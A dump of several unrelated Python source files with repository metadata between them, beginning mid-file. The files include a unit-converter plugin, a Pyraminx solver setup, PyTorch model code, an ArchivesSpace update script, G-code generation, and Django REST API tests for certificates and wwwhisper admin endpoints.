name = "Converter"
keywords = ["convert", "converter", "conversion"]
convregex = re.compile(
"(convert|change)(.*)", re.IGNORECASE)
def init(self):
pass
def process_input(self):
if self.match_and_reduce(self.convregex):
expression = self.last_matched.groups()[-1].strip()
if expression:
try:
# Try conversion
service = ConversionService()
self.result = service.convert(expression)
self.status = self.SUCCESS
except:
# Fail silently
pass
def process(self):
self.add_response("Result : " + str(self.result))
@classmethod
def help(cls):
return {
"name": "Conversion",
"description": "Conversion between units",
"samples": [
"convert a pound to kg",
"change Seven and a half kilograms to pounds",
"convert Seven and a half pounds per square foot to kilograms per meter squared",
]
}
| 25.942308 | 101 | 0.530022 |
abd45386c13bbf86460d0c5870b53d4590ef63ba | 933 | py | Python | clients/client/python/test/test_volume.py | simoneromano96/sdk | a6113d0daefbbb803790297e4b242d4c7cbbcb22 | [
"Apache-2.0"
] | null | null | null | clients/client/python/test/test_volume.py | simoneromano96/sdk | a6113d0daefbbb803790297e4b242d4c7cbbcb22 | [
"Apache-2.0"
] | null | null | null | clients/client/python/test/test_volume.py | simoneromano96/sdk | a6113d0daefbbb803790297e4b242d4c7cbbcb22 | [
"Apache-2.0"
] | null | null | null | """
Ory APIs
Documentation for all public and administrative Ory APIs. Administrative APIs can only be accessed with a valid Personal Access Token. Public APIs are mostly used in browsers. # noqa: E501
The version of the OpenAPI document: v0.0.1-alpha.3
Contact: support@ory.sh
Generated by: https://openapi-generator.tech
"""
import sys
import unittest
import ory_client
from ory_client.model.volume_usage_data import VolumeUsageData
globals()['VolumeUsageData'] = VolumeUsageData
from ory_client.model.volume import Volume
class TestVolume(unittest.TestCase):
"""Volume unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testVolume(self):
"""Test Volume"""
# FIXME: construct object with mandatory attributes with example values
# model = Volume() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| 23.923077 | 194 | 0.697749 |
abd6eef90ad96992e821c7e62a12d3098278c5bf | 1,191 | py | Python | pyraminxolver/setup.py | Odder/PyraminXolver | f497a3936e63a51bb9de4d445db0a1399ae4b85c | [
"MIT"
] | 1 | 2020-02-16T11:11:35.000Z | 2020-02-16T11:11:35.000Z | pyraminxolver/setup.py | Odder/PyraminXolver | f497a3936e63a51bb9de4d445db0a1399ae4b85c | [
"MIT"
] | 1 | 2019-10-06T07:19:56.000Z | 2019-10-26T20:39:19.000Z | pyraminxolver/setup.py | Odder/PyraminXolver | f497a3936e63a51bb9de4d445db0a1399ae4b85c | [
"MIT"
] | 1 | 2019-11-22T15:53:29.000Z | 2019-11-22T15:53:29.000Z | from collections import deque
import pickle
from . import Pyraminx, PYRAMINX_CASE_PATH
from multiprocessing import Pool, cpu_count
def setup():
graph = create_graph()
with open(PYRAMINX_CASE_PATH, 'wb') as f:
pickle.dump(graph, f, pickle.HIGHEST_PROTOCOL)
def create_graph():
with Pool(cpu_count()) as p:
graph = p.map(explore_node, [x for x in range(933120)])
graph = generate_depths(graph)
return graph
def explore_node(node):
state = Pyraminx.id_to_state(node)
node_values = [-1, -1, -1, -1, -1, -1, -1, -1, -1]
for i in range(1, 9):
transformation = Pyraminx.move_transformations[i - 1]
new_state = Pyraminx.apply_move(state, transformation)
new_id = Pyraminx.state_to_id(new_state)
node_values[i] = new_id
return node_values
def generate_depths(graph):
queue = deque()
graph[0][0] = 0
queue.append(0)
while queue:
i = queue.popleft()
depth = graph[i][0]
for edge in graph[i][1:]:
if graph[edge][0] == -1:
graph[edge][0] = depth + 1
queue.append(edge)
return graph
if __name__ == '__main__':
setup()
| 24.8125 | 63 | 0.618808 |
abd7ebb6a3efed0c59a0bf6d4b58df0c2f293555 | 307 | py | Python | Models/utils.py | Pipe-Runner-Lab/cornell_birdcall_identification | 79a807c4a7e368b2ffcb7ecc91176c2bc03f650a | [
"MIT"
] | null | null | null | Models/utils.py | Pipe-Runner-Lab/cornell_birdcall_identification | 79a807c4a7e368b2ffcb7ecc91176c2bc03f650a | [
"MIT"
] | 7 | 2021-08-23T20:52:07.000Z | 2022-03-12T00:48:51.000Z | Models/utils.py | Pipe-Runner-Lab/cornell_birdcall_identification | 79a807c4a7e368b2ffcb7ecc91176c2bc03f650a | [
"MIT"
] | null | null | null | from torch import nn
def get_default_fc(num_ftrs,adjusted_classes, params):
return nn.Sequential(
nn.Linear(num_ftrs, 1024),nn.ReLU(),nn.Dropout(p=params.fc_drop_out_0),
nn.Linear(1024, 1024),nn.ReLU(),nn.Dropout(p=params.fc_drop_out_1),
nn.Linear(1024, adjusted_classes)
)
| 34.111111 | 79 | 0.703583 |
abd8b52c7e5526a7a50e3b7112ad423f0a22076f | 4,452 | py | Python | dgp/features/feature_ontology.py | chrisochoatri/dgp | 7eb437072b656804a8716186cc61f6ba148e3a46 | [
"MIT"
] | null | null | null | dgp/features/feature_ontology.py | chrisochoatri/dgp | 7eb437072b656804a8716186cc61f6ba148e3a46 | [
"MIT"
] | null | null | null | dgp/features/feature_ontology.py | chrisochoatri/dgp | 7eb437072b656804a8716186cc61f6ba148e3a46 | [
"MIT"
] | null | null | null | # Copyright 2021-2022 Toyota Research Institute. All rights reserved.
import os
from collections import OrderedDict
from dgp.proto.ontology_pb2 import FeatureOntology as FeatureOntologyPb2
from dgp.proto.ontology_pb2 import FeatureOntologyItem
from dgp.utils.protobuf import (generate_uid_from_pbobject, open_feature_ontology_pbobject, save_pbobject_as_json)
class FeatureOntology:
"""Feature ontology object. At bare minimum, we expect ontologies to provide:
ID: (int) identifier for feature field name
Name: (str) string identifier for feature field name
Based on the task, additional fields may be populated. Refer to `dataset.proto` and `ontology.proto`
specifications for more details. Can be constructed from file or from deserialized proto object.
Parameters
----------
feature_ontology_pb2: OntologyPb2
Deserialized ontology object.
"""
# Special value and class name reserved for pixels that should be ignored
VOID_ID = 255
VOID_CLASS = "Void"
def __init__(self, feature_ontology_pb2):
self._ontology = feature_ontology_pb2
if isinstance(self._ontology, FeatureOntologyPb2):
self._name_to_id = OrderedDict(
sorted([(ontology_item.name, ontology_item.id) for ontology_item in self._ontology.items])
)
self._id_to_name = OrderedDict(
sorted([(ontology_item.id, ontology_item.name) for ontology_item in self._ontology.items])
)
self._id_to_feature_value_type = OrderedDict(
sorted([(ontology_item.id, ontology_item.feature_value_type) for ontology_item in self._ontology.items])
)
else:
raise TypeError("Unexpected type {}, expected FeatureOntologyV2".format(type(self._ontology)))
self._feature_ids = sorted(self._id_to_name.keys())
self._feature_names = [self._id_to_name[c_id] for c_id in self._feature_ids]
@classmethod
def load(cls, ontology_file):
"""Construct an ontology from an ontology JSON.
Parameters
----------
ontology_file: str
Path to ontology JSON
"""
if os.path.exists(ontology_file):
feature_ontology_pb2 = open_feature_ontology_pbobject(ontology_file)
else:
raise FileNotFoundError("Could not find {}".format(ontology_file))
if feature_ontology_pb2 is not None:
return cls(feature_ontology_pb2)
raise TypeError("Could not open ontology {}".format(ontology_file))
def to_proto(self):
"""Serialize ontology. Only supports exporting in OntologyV2.
Returns
-------
OntologyPb2
Serialized ontology
"""
return FeatureOntologyPb2(
items=[
FeatureOntologyItem(
name=name, id=feature_id, feature_value_type=self.id_to_feature_value_type[feature_id]
) for feature_id, name in self._id_to_name.items()
]
)
def save(self, save_dir):
"""Write out ontology items to `<sha>.json`. SHA generated from Ontology proto object.
Parameters
----------
save_dir: str
Directory in which to save serialized ontology.
Returns
-------
output_ontology_file: str
Path to serialized ontology file.
"""
os.makedirs(save_dir, exist_ok=True)
return save_pbobject_as_json(self.to_proto(), save_path=save_dir)
@property
def num_classes(self):
return len(self._feature_ids)
@property
def class_names(self):
return self._feature_names
@property
def class_ids(self):
return self._feature_ids
@property
def name_to_id(self):
return self._name_to_id
@property
def id_to_name(self):
return self._id_to_name
@property
def id_to_feature_value_type(self):
return self._id_to_feature_value_type
@property
def hexdigest(self):
"""Hash object"""
return generate_uid_from_pbobject(self.to_proto())
def __eq__(self, other):
return self.hexdigest == other.hexdigest
def __repr__(self):
return "{}[{}]".format(self.__class__.__name__, os.path.basename(self.hexdigest))
class AgentFeatureOntology(FeatureOntology):
"""Agent feature ontologies derive directly from Ontology"""
| 32.49635 | 120 | 0.659704 |
abdc66f427d245a23a8cd8f7219011f041e2e90d | 2,321 | py | Python | APIFunctions/replace_resources.py | cul/archivesspace | 9c088d4495cf1006c7d02ed2850224a9d28b35c1 | [
"MIT"
] | 4 | 2018-12-13T16:18:30.000Z | 2020-02-14T14:01:28.000Z | APIFunctions/replace_resources.py | cul/archivesspace | 9c088d4495cf1006c7d02ed2850224a9d28b35c1 | [
"MIT"
] | null | null | null | APIFunctions/replace_resources.py | cul/archivesspace | 9c088d4495cf1006c7d02ed2850224a9d28b35c1 | [
"MIT"
] | 2 | 2019-09-03T19:15:24.000Z | 2020-12-01T20:27:14.000Z | # Script to replace text in a designated field in a resource and post the resource back to API.
# Requirements:
# - ASFunctions.py
# - A csv of format repo,asid
# - sheetFeeder (optional, for reporting purposes)
import ASFunctions as asf
import json
from pprint import pprint
import re
import csv
from sheetFeeder import dataSheet
def main():
asf.setServer('Test')
# Google sheet used for reporting changes.
the_report_sheet=dataSheet('1wNO0t2j5G9U0hUmb7E-jLd4T5skTs1aRxN7HrlyZwEI','resources!A:Z')
id_file = 'resource_replacements.csv'
output_folder = 'output/resource_replacements'
# Read a list of repo and object ids (csv)
the_ids = []
ids = open(id_file)
for row in csv.reader(ids):
the_ids.append([row[0],row[1]])
ids.close()
# Search/replace patterns
the_search_pattern = 'NCC'
the_replace_pattern = 'NNC'
the_before_afters = []
the_heads = ['repo', 'asid','before', 'after']
the_before_afters.append(the_heads)
for an_obj in the_ids:
out_path = output_folder + '/' + an_obj[0] + '_' + an_obj[1] + '_old.json'
# read from API
x = asf.getResource(an_obj[0],an_obj[1])
# Save copy of existing object
print('Saving data to ' + out_path + '....')
f = open(out_path, "w+")
f.write(x)
f.close()
x = json.loads(x)
the_old_field_data = x['user_defined']['string_2']
y = x
y['user_defined']['string_2'] = re.sub(the_search_pattern, the_replace_pattern, x['user_defined']['string_2'])
if y['user_defined']['string_2'] == the_old_field_data:
the_new_field_data = "[no change]"
else:
the_new_field_data = y['user_defined']['string_2']
the_before_afters.append([an_obj[0], an_obj[1], '{string_2} ' + the_old_field_data, '{string_2} ' + the_new_field_data ])
# convert dict back to json for posting.
z = json.dumps(y)
# Post the fixed object back to API.
post = asf.postResource(an_obj[0], an_obj[1], z)
print(post)
# Report changes to Google Sheet
print('Writing before/after info to sheet...')
the_report_sheet.clear()
the_report_sheet.appendData(the_before_afters)
if __name__ == '__main__':
main()
| 22.980198 | 129 | 0.637225 |
abde163a27adea2e134a7e338567ffa9749d3d5e | 1,139 | py | Python | db25_hole_plate/cnc/boundary.py | iorodeo/panels_mpja_1u | 6d3a44150b41d25457041b9246be11b1778112bc | [
"Apache-2.0"
] | 1 | 2020-07-23T19:04:06.000Z | 2020-07-23T19:04:06.000Z | db25_hole_plate/cnc/boundary.py | iorodeo/panels_mpja_1u | 6d3a44150b41d25457041b9246be11b1778112bc | [
"Apache-2.0"
] | null | null | null | db25_hole_plate/cnc/boundary.py | iorodeo/panels_mpja_1u | 6d3a44150b41d25457041b9246be11b1778112bc | [
"Apache-2.0"
] | null | null | null | from __future__ import print_function
import os
import sys
from py2gcode import gcode_cmd
from py2gcode import cnc_dxf
fileName = sys.argv[1]
feedrate = 120.0
prog = gcode_cmd.GCodeProg()
prog.add(gcode_cmd.GenericStart())
prog.add(gcode_cmd.Space())
prog.add(gcode_cmd.FeedRate(feedrate))
prog.add(gcode_cmd.PathBlendMode(p=0.02,q=0.01))
layerNames = ['boundary']
param = {
'fileName' : fileName,
'layers' : layerNames,
'depth' : 0.09,
'startZ' : 0.0,
'safeZ' : 0.3,
'toolDiam' : 0.125,
'direction' : 'ccw',
'cutterComp' : 'outside',
'maxCutDepth' : 0.12,
'startDwell' : 2.0,
'startCond' : 'minX',
'maxArcLen' : 1.0e-2,
'ptEquivTol' : 1.0e-5,
}
boundary = cnc_dxf.DxfBoundary(param)
prog.add(boundary)
prog.add(gcode_cmd.Space())
prog.add(gcode_cmd.ExactPathMode())
prog.add(gcode_cmd.Space())
prog.add(gcode_cmd.End(),comment=True)
baseName, dummy = os.path.splitext(__file__)
fileName = '{0}.ngc'.format(baseName)
print('generating: {0}'.format(fileName))
prog.write(fileName)
| 25.311111 | 48 | 0.624232 |
abde3c4b3322bc497127bee1536c6ca6039746ca | 852 | py | Python | packages/sia/datetime.py | varunsrivatsa/Sia | c5fc99f357138cfbcf050277f1aa201048cd26f4 | [
"MIT"
] | 3 | 2022-01-28T17:51:05.000Z | 2022-03-25T14:57:52.000Z | packages/sia/datetime.py | varunsrivatsa/Sia | c5fc99f357138cfbcf050277f1aa201048cd26f4 | [
"MIT"
] | 19 | 2022-01-16T08:23:52.000Z | 2022-03-18T22:27:02.000Z | packages/sia/datetime.py | varunsrivatsa/Sia | c5fc99f357138cfbcf050277f1aa201048cd26f4 | [
"MIT"
] | 1 | 2022-03-09T06:23:42.000Z | 2022-03-09T06:23:42.000Z | #!/usr/bin/env python
# -*- coding:utf-8 -*-
import utils
from datetime import datetime
import calendar
def run(string, entities):
"""Sia tells time and date"""
string = string.lower()
now = datetime.now()
day = datetime.today()
if string.find("time") != -1 and string.find("date") == -1:
return utils.output('end', 'datetime', "Time is " + now.strftime("%I:%M %p"))
elif string.find("date") != -1 and string.find("time") == -1:
return utils.output('end', 'datetime', now.strftime("%B %d, %Y"))
elif string.find("day") != -1:
return utils.output('end', 'datetime', "Today is " + calendar.day_name[day.weekday()])
elif string.find("time") != -1 and string.find("date") != -1:
return utils.output('end', 'datetime', "Today's " + now.strftime(" date is %d-%m-%Y, and time is %I:%M %p"))
| 37.043478 | 116 | 0.593897 |
abdf820c98b1659e30fa822be8c125f87ed89cc6 | 1,477 | py | Python | python/rl_agent/model.py | iShohei220/Grounded-Language-Learning-in-Pytorch | 75859829258dd33d4a75f79dc9348a1671a68b81 | [
"CC-BY-4.0"
] | null | null | null | python/rl_agent/model.py | iShohei220/Grounded-Language-Learning-in-Pytorch | 75859829258dd33d4a75f79dc9348a1671a68b81 | [
"CC-BY-4.0"
] | null | null | null | python/rl_agent/model.py | iShohei220/Grounded-Language-Learning-in-Pytorch | 75859829258dd33d4a75f79dc9348a1671a68b81 | [
"CC-BY-4.0"
] | 1 | 2021-01-16T19:53:55.000Z | 2021-01-16T19:53:55.000Z | import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
import torch.optim as optim
import numpy as np
from collections import namedtuple
from network_modules import *
State = namedtuple('State', ('visual', 'instruction'))
class Model(nn.Module):
def __init__(self, action_space):
super(Model, self).__init__()
# Core modules
self.vision_m = Vision_M()
self.language_m = Language_M()
self.mixing_m = Mixing_M()
self.action_m = Action_M()
# Action selection and Value Critic
self.policy = Policy(action_space=action_space)
# Auxiliary networks
self.tAE = temporal_AutoEncoder(self.policy, self.vision_m)
self.language_predictor = Language_Prediction(self.language_m)
self.reward_predictor = RewardPredictor(self.vision_m, self.language_m, self.mixing_m)
def forward(self, x):
'''
Argument:
img: environment image, shape [batch_size, 84, 84, 3]
instruction: natural language instruction [batch_size, seq]
'''
vision_out = self.vision_m(x.visual)
language_out = self.language_m(x.instruction)
mix_out = self.mixing_m(vision_out, language_out)
action_out = self.action_m(mix_out)
action_prob, value = self.policy(action_out)
return action_prob, value | 31.425532 | 94 | 0.641842 |
abe247f69531769f09c500de2ab3ea0c0fe0c0ac | 6,939 | py | Python | rr/tests/api/test_views_api_certificate.py | UniversityofHelsinki/sp-registry | b1336b89788c076bf93f61b97b5469a99acd902c | [
"MIT"
] | null | null | null | rr/tests/api/test_views_api_certificate.py | UniversityofHelsinki/sp-registry | b1336b89788c076bf93f61b97b5469a99acd902c | [
"MIT"
] | 1 | 2020-08-10T13:16:58.000Z | 2020-08-18T06:30:20.000Z | rr/tests/api/test_views_api_certificate.py | UniversityofHelsinki/sp-registry | b1336b89788c076bf93f61b97b5469a99acd902c | [
"MIT"
] | null | null | null | from django.contrib.auth.models import User
from rest_framework import status
from rest_framework.test import APIRequestFactory
from rr.models.certificate import Certificate
from rr.models.serviceprovider import ServiceProvider
from rr.tests.api.api_common import APITestCase
from rr.views_api.certificate import CertificateViewSet
class CertificateTestCase(APITestCase):
def setUp(self):
self.factory = APIRequestFactory()
self.user = User.objects.create(username='tester')
self.superuser = User.objects.create(username='superuser', is_superuser=True)
self.user_sp = ServiceProvider.objects.create(entity_id='https://sp2.example.org/sp', service_type='saml',
name_en='My Test')
self.user_sp.admins.add(self.user)
self.admin_sp = ServiceProvider.objects.create(entity_id='test:entity:1', service_type='saml')
self.valid_certificate = """MIIFBTCCAu2gAwIBAgIJAKOceIf3koqXMA0GCSqGSIb3DQEBCwUAMBkxFzAVBgNV
BAMMDnNwLmV4YW1wbGUub3JnMB4XDTE4MDExNjExMTAxN1oXDTI4MDExNDExMTAx
N1owGTEXMBUGA1UEAwwOc3AuZXhhbXBsZS5vcmcwggIiMA0GCSqGSIb3DQEBAQUA
A4ICDwAwggIKAoICAQDlomqiyCbu1nKL9BtTwFjuNr0O2iDrQ1DbOnMu6E3tg0CO
kvmxzy7e9RuVzJUzz4bCz5u7xoHAFzaOX/k0FwRp32k9//4KNiioZta+sOE5ewyi
9ooOxqYtBMC7xy4AF/+7U2XoeGvdPPswUjEB0b312K4Xu3tvQy4ZdDhIiIHizLng
bHOUX8Isq50z8PmSEPE/DMMfK4mvfSMT067fC6tX+WHjlb8PHgEBn09f8kL76+x6
JLm6uGPN2M0lL1mtoN3lumYxldifsf2REuZdVSQYGRqQWjvMDJCPy1NRyvUHRDRr
FWIgEJhSpp0PdLd+9oK4Wccw8L2PN/khpXAJAVrAuMrOzASWL+ZuCQbUHSoK0Asb
4eN5jgDBNU63P/Ev4//JaUwNmYWMSeqEEKzun0WansZFC2LUkVjvuSZ2JV4bzu+s
pRdj0dkEa5HOhk7Bvd/eN0h2aVLsF3EgXekDudbKXMwQOxrazJoVHv9pwxsZxlHK
LP298175K/skR8VASQdH3JBrXpdiDb4mLoyXdx/I11Tx13fuiQogIRcm6ccqy/Ob
1nFzh1tkqTaFJF2F3cLCpbrqv853vWC08bRACkIeJQ8R8EDJudvk3cQllHHfItss
yoR//TcHJXsu+zwTruW6wdLkXShG3v2N2zplChuUczFYOT1FjZa+hRhk8p6tOwID
AQABo1AwTjAdBgNVHQ4EFgQU2TjrYXoZH0JkPA3YIZe+H0v1jqcwHwYDVR0jBBgw
FoAU2TjrYXoZH0JkPA3YIZe+H0v1jqcwDAYDVR0TBAUwAwEB/zANBgkqhkiG9w0B
AQsFAAOCAgEAJUjWKsLdtVI5xqfi7RLk1viyTdvKi2sTkXgKySNPffwRLoEcmIAp
FPX0TAhsoBdxE7OFwlSmb6ZX89CtNlwyyVHlWemwgKNfjdgj0qkk7Lreq+L1si6j
diml6uFfMbZrHtppxHENDYckxxfD3Zooa/pY9NUG17BHzoNTAsDhFq7YCA4Y2j6h
acYh1pa0PQ4rhE2zhFs3AZF+gaYGdwtKEcJBEQ6OcctP3Y8K/FTDmJAK3dERdmrh
BdeYSRTQSQMm0W1SsIsEMEfndC1Cca/aKrl8B1tZz55s04WPx/e92NV9S5KGRH0G
UADycvLo12NUfqubK+2+bcH92rhHZ1QGjkfJmHwhXIqt8F1gysQQO+M3uYhlpiIR
4vQBWFqoMCT7lqQYj1tCvrt6+RVv3Zz8t0eMfJXSFAoJPbjv3npPcUfjmLRG7W9y
VSb6gzk3PYRVB0NzmlPdB4KFdBQbsuE8qoPr3UBbHIiD9wFU6K6eUZkIjqIV/5az
56c2mntFDpdx+46RkS/7CEAbZkD8kEM5vrhpDXhbfLzIDTnOTBTbrwGmPCnpYSXy
rKLt+NcwtbkI6weLISJu9lFZnPMYT7LpqDWD4aMHHUWr8THO0T6mbCeQRYMlfSpU
0es8zIhYt2fRbxHFRIFyRZYJrQoSfkU5OMas/ypz/q2wOvgqjH8qyRQ=
"""
self.object = Certificate.objects.add_certificate(certificate=self.valid_certificate,
sp=self.user_sp,
encryption=False,
signing=True)
self.superuser_object = Certificate.objects.add_certificate(certificate=self.valid_certificate,
sp=self.admin_sp,
encryption=False,
signing=False)
self.data = {'id': self.object.id,
'sp': self.object.sp.id,
'certificate': self.object.certificate,
'signing': self.object.signing,
'encryption': self.object.encryption}
self.create_data = {'sp': self.object.sp.id,
'certificate': self.valid_certificate,
'signing': True,
'encryption': True}
self.create_error_data = {'sp': self.object.sp.id,
'certificate': self.valid_certificate[:-20],
'signing': True,
'encryption': True}
self.url = '/api/v1/certificates/'
self.viewset = CertificateViewSet
self.model = Certificate
def test_certificate_access_list_without_user(self):
response = self._test_list(user=None)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
def test_certificate_access_list_with_normal_user(self):
response = self._test_list(user=self.user)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(len(response.data['results']), 1)
def test_certificate_access_list_with_superuser(self):
response = self._test_list(user=self.superuser)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(len(response.data['results']), 2)
def test_certificate_access_object_without_user(self):
response = self._test_access(user=None, pk=self.object.pk)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
def test_certificate_access_object_with_normal_user(self):
response = self._test_access(user=self.user, pk=self.object.pk)
self.assertEqual(response.status_code, status.HTTP_200_OK)
for key in self.data:
self.assertEqual(response.data[key], self.data[key])
def test_certificate_access_object_with_normal_user_without_permission(self):
response = self._test_access(user=self.user, pk=self.superuser_object.pk)
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
def test_certificate_access_object_with_superuser(self):
response = self._test_access(user=self.user, pk=self.object.pk)
self.assertEqual(response.status_code, status.HTTP_200_OK)
for key in self.data:
self.assertEqual(response.data[key], self.data[key])
def test_certificate_create_with_user(self):
response = self._test_create(user=self.user, data=self.create_data)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
for key in self.create_data:
self.assertEqual(response.data[key], self.create_data[key])
def test_certificate_create_error_with_user(self):
response = self._test_create(user=self.user, data=self.create_error_data)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_certificate_delete_with_user(self):
response = self._test_delete(user=self.user, pk=self.object.pk)
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
self.assertIsNotNone(Certificate.objects.get(pk=self.object.pk).end_at)
def test_certificate_delete_with_user_without_permission(self):
response = self._test_delete(user=self.user, pk=self.superuser_object.pk)
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
| 55.071429 | 114 | 0.724024 |
abe24ac8d4f36a5234b583961dedd7e2bc567ce6 | 2,298 | py | Python | convlab/modules/e2e/multiwoz/Mem2Seq/Mem2Seq.py | ngduyanhece/ConvLab | a04582a77537c1a706fbf64715baa9ad0be1301a | [
"MIT"
] | 405 | 2019-06-17T05:38:47.000Z | 2022-03-29T15:16:51.000Z | convlab/modules/e2e/multiwoz/Mem2Seq/Mem2Seq.py | ngduyanhece/ConvLab | a04582a77537c1a706fbf64715baa9ad0be1301a | [
"MIT"
] | 69 | 2019-06-20T22:57:41.000Z | 2022-03-04T12:12:07.000Z | convlab/modules/e2e/multiwoz/Mem2Seq/Mem2Seq.py | ngduyanhece/ConvLab | a04582a77537c1a706fbf64715baa9ad0be1301a | [
"MIT"
] | 124 | 2019-06-17T05:11:23.000Z | 2021-12-31T05:58:18.000Z | # -*- coding: utf-8 -*-
# Modified by Microsoft Corporation.
# Licensed under the MIT license.
"""
"""
import numpy as np
import torch
from nltk import word_tokenize
from .models.Mem2Seq import Mem2Seq
from .utils.config import args, USE_CUDA, UNK_token
from .utils.utils_woz_mem2seq import prepare_data_seq, generate_memory, MEM_TOKEN_SIZE
def plain2tensor(word2index, memory):
src_seqs = []
for token in memory:
src_seq = []
for word in token:
if word in word2index:
src_seq.append(word2index[word])
else:
src_seq.append(UNK_token)
src_seqs.append([src_seq])
return torch.LongTensor(src_seqs).cuda() if USE_CUDA else torch.LongTensor(src_seqs)
def denormalize(uttr):
uttr = uttr.replace(' -s', 's')
uttr = uttr.replace(' -ly', 'ly')
uttr = uttr.replace(' -er', 'er')
return uttr
class Mem2seq:
def __init__(self):
directory = args['path'].split("/")
task = directory[-1].split('HDD')[0]
HDD = directory[-1].split('HDD')[1].split('BSZ')[0]
L = directory[-1].split('L')[1].split('lr')[0]
_, _, _, _, self.lang, max_len, max_r = prepare_data_seq(task, batch_size=1)
self.model = Mem2Seq(int(HDD),max_len,max_r,self.lang,args['path'],task, lr=0.0, n_layers=int(L), dropout=0.0, unk_mask=0)
self.reset()
def reset(self):
self.t = 0
self.memory = []
def predict(self, query):
usr = query
print('Mem2Seq usr:', usr)
#example input: 'please find a restaurant called nusha .'
self.t += 1
print('Mem2Seq turn:', self.t)
usr = ' '.join(word_tokenize(usr.lower()))
self.memory += generate_memory(usr, '$u', self.t)
src_plain = (self.memory+[['$$$$']*MEM_TOKEN_SIZE],)
src_seqs = plain2tensor(self.lang.word2index, src_plain[0])
words = self.model.evaluate_batch(1, src_seqs, [len(src_plain[0])], None, None, None, None, src_plain)
row = np.transpose(words)[0].tolist()
if '<EOS>' in row:
row = row[:row.index('<EOS>')]
sys = ' '.join(row)
sys = denormalize(sys)
print('Mem2Seq sys:', sys)
self.memory += generate_memory(sys, '$s', self.t)
return sys
| 33.304348 | 130 | 0.597476 |
abe3cbe49477fe37d4fc16249de8a10f4fb4a013 | 18 | py | Python | mit_semseg/lib/utils/__init__.py | starkgines/PDI | dd6908c022179f935ae25d3afee9ea44bb49f162 | [
"BSD-3-Clause"
] | 4,303 | 2018-04-08T00:48:44.000Z | 2022-03-31T12:54:08.000Z | mit_semseg/lib/utils/__init__.py | starkgines/PDI | dd6908c022179f935ae25d3afee9ea44bb49f162 | [
"BSD-3-Clause"
] | 212 | 2018-04-08T16:02:59.000Z | 2022-03-16T14:52:44.000Z | mit_semseg/lib/utils/__init__.py | starkgines/PDI | dd6908c022179f935ae25d3afee9ea44bb49f162 | [
"BSD-3-Clause"
] | 1,057 | 2018-04-08T03:29:26.000Z | 2022-03-30T17:36:12.000Z | from .th import *
| 9 | 17 | 0.666667 |
abe581f27ace8a8b0cd1d152b02ba112d26b24bc | 21,754 | py | Python | wwwhisper_admin/tests/tests_views.py | wrr/wwwhisper | 38a55dd9c828fbb1b5a8234ea3ddf2242e684983 | [
"MIT"
] | 54 | 2015-01-19T23:49:39.000Z | 2021-02-18T01:14:51.000Z | wwwhisper_admin/tests/tests_views.py | wrr/wwwhisper | 38a55dd9c828fbb1b5a8234ea3ddf2242e684983 | [
"MIT"
] | 13 | 2015-01-26T14:51:10.000Z | 2020-11-10T04:15:36.000Z | wwwhisper_admin/tests/tests_views.py | wrr/wwwhisper | 38a55dd9c828fbb1b5a8234ea3ddf2242e684983 | [
"MIT"
] | 11 | 2015-07-25T02:13:12.000Z | 2021-07-10T14:11:46.000Z | # wwwhisper - web access control.
# Copyright (C) 2012-2018 Jan Wrobel <jan@mixedbit.org>
from wwwhisper_auth.models import Site
from wwwhisper_auth.tests.utils import HttpTestCase
from wwwhisper_auth.tests.utils import TEST_SITE
import json
FAKE_UUID = '41be0192-0fcc-4a9c-935d-69243b75533c'
TEST_USER_EMAIL = 'foo@bar.org'
TEST_LOCATION = '/pub/kika/'
TEST_ALIAS = 'https://foo.example.org'
def uid_regexp():
return '[0-9a-z-]{36}'
def extract_uuid(urn):
return urn.replace('urn:uuid:', '')
class AdminViewTestCase(HttpTestCase):
def add_user(self, user_name=TEST_USER_EMAIL):
response = self.post('/wwwhisper/admin/api/users/',
{'email' : user_name})
self.assertEqual(201, response.status_code)
return json.loads(response.content)
def add_location(self):
response = self.post('/wwwhisper/admin/api/locations/',
{'path' : TEST_LOCATION})
self.assertEqual(201, response.status_code)
return json.loads(response.content)
def add_alias(self):
response = self.post('/wwwhisper/admin/api/aliases/',
{'url' : TEST_ALIAS})
self.assertEqual(201, response.status_code)
return json.loads(response.content)
class UserTest(AdminViewTestCase):
def test_add_user(self):
response = self.post('/wwwhisper/admin/api/users/',
{'email' : TEST_USER_EMAIL})
self.assertEqual(201, response.status_code)
parsed_response_body = json.loads(response.content)
user_uuid = extract_uuid(parsed_response_body['id'])
self.assertRegexpMatches(parsed_response_body['id'],
'^urn:uuid:%s$' % uid_regexp())
self.assertEqual(TEST_USER_EMAIL, parsed_response_body['email'])
self_url = '%s/wwwhisper/admin/api/users/%s/' % (TEST_SITE, user_uuid)
self.assertEqual(self_url, parsed_response_body['self'])
self.assertEqual(self_url, response['Location'])
self.assertEqual(self_url, response['Content-Location'])
def test_get_user(self):
parsed_add_user_response_body = self.add_user()
get_response = self.get(parsed_add_user_response_body['self'])
self.assertEqual(200, get_response.status_code)
parsed_get_response_body = json.loads(get_response.content)
self.assertEqual(parsed_add_user_response_body,
parsed_get_response_body)
def test_delete_user(self):
user_url = self.add_user()['self']
self.assertEqual(204, self.delete(user_url).status_code)
self.assertEqual(404, self.get(user_url).status_code)
def test_get_users_list(self):
self.assertEqual(201, self.post('/wwwhisper/admin/api/users/',
{'email' : 'foo@bar.org'}).status_code)
self.assertEqual(201, self.post('/wwwhisper/admin/api/users/',
{'email' : 'baz@bar.org'}).status_code)
self.assertEqual(201, self.post('/wwwhisper/admin/api/users/',
{'email' : 'boo@bar.org'}).status_code)
response = self.get('/wwwhisper/admin/api/users/')
self.assertEqual(200, response.status_code)
parsed_response_body = json.loads(response.content)
self.assertEqual('%s/wwwhisper/admin/api/users/' % TEST_SITE,
parsed_response_body['self'])
users = parsed_response_body['users']
self.assertEqual(3, len(users))
self.assertItemsEqual(['foo@bar.org', 'baz@bar.org', 'boo@bar.org'],
[item['email'] for item in users])
